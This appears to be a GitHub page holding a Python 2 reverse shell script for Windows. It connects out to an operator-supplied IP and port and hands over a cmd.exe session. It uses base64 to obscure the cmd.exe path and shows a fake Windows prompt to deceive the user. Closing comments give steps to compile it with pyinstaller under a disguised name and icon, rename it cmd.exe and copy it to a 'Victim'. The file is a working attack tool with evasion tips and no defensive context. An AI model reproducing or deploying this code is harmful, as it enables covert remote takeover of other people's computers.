-
Notifications
You must be signed in to change notification settings - Fork 1
/
python2_reverse_shell.py
117 lines (93 loc) · 3.02 KB
/
python2_reverse_shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
import os, sys, socket, subprocess, threading, base64, time
"""
Connect back to home with "cmd.exe"
Reverse cmd shell
"""
def server2process(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
def process2server(s, p):
while True:
s.send(p.stdout.read(1))
"""
Simulate Windows cmd prompt
"""
def fake_prompt():
os.system("cls")
"""
Microsoft Windows [Version 10.0.17134.1069]
TWljcm9zb2Z0IFdpbmRvd3MgW1ZlcnNpb24gMTAuMC4xNzEzNC4xMDY5XQ==
(c) 2018 Microsoft Corporation. All rights reserved.
KGMpIDIwMTggTWljcm9zb2Z0IENvcnBvcmF0aW9uLiBBbGwgcmlnaHRzIHJlc2VydmVkLg==
"""
sys.stdout.write(
str((base64.b64decode("TWljcm9zb2Z0IFdpbmRvd3MgW1ZlcnNpb24gMTAuMC4xNzEzNC4xMDY5XQ==").decode("utf-8"))) + "\n"
+ str((base64.b64decode("KGMpIDIwMTggTWljcm9zb2Z0IENvcnBvcmF0aW9uLiBBbGwgcmlnaHRzIHJlc2VydmVkLg==").decode("utf-8")))
+ "\n\n" + os.getcwd() + ">"
)
"""
Check arguments
"""
if __name__ == "__main__":
if len(sys.argv) == 1:
sys.exit(0)
if len(sys.argv) == 2:
if sys.argv[1] == "-h":
print("\n >>> Reverse SHELL")
print("\n >>> USAR: python_reverse_shell.py <Remote_IP> <Remote_Port>")
sys.exit(0)
sys.exit(0)
if len(sys.argv) == 3:
remote_ip = str(sys.argv[1])
remote_port = int(sys.argv[2])
else:
sys.exit(0)
"""
Begin process to connect back to home :)
"""
time.sleep(2)
fake_prompt()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((remote_ip, remote_port))
"""
## Windows call "cmd.exe"
#p = subprocess.Popen(["c:\windows\system32\cmd.exe"],stdout=subprocess.PIPE,stderr=subprocess.STDOUT,stdin=subprocess.PIPE,)
## Converting to Base64 ( simple obfuscation :)
"c:\windows\system32\cmd.exe"
ImM6XHdpbmRvd3Ncc3lzdGVtMzJcY21kLmV4ZSI=
"""
# From Base64 to Original String
cmd_string = str(
(base64.b64decode("ImM6XHdpbmRvd3Ncc3lzdGVtMzJcY21kLmV4ZSI=").decode("utf-8"))
)
time.sleep(2)
# Call Process and TCP
p = subprocess.Popen(
[eval(cmd_string)],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE,
)
server2process_thread = threading.Thread(target=server2process, args=[s, p])
server2process_thread.daemon = True
server2process_thread.start()
process2server_thread = threading.Thread(target=process2server, args=[s, p])
process2server_thread.daemon = True
process2server_thread.start()
try:
p.wait()
except KeyboardInterrupt:
s.close()
"""
Python 2
--------
1) Install "Python 2.7" Windows
2) Install "pyinstaller"
C:\Python2\Scripts\> pip.exe install pynstaller
3) Convert from .py to .exe
C:\Python2\Scripts\> pyinstaller.exe c:\python_reverse_shell_p2.py --clean --onefile --console --icon=c:\Windows\System32\cmd.exe --name notepadpp.exe
4) Cambiar nombre "notepadpp.exe" -> "cmd.exe"
5) Copiarlo a Victim
"""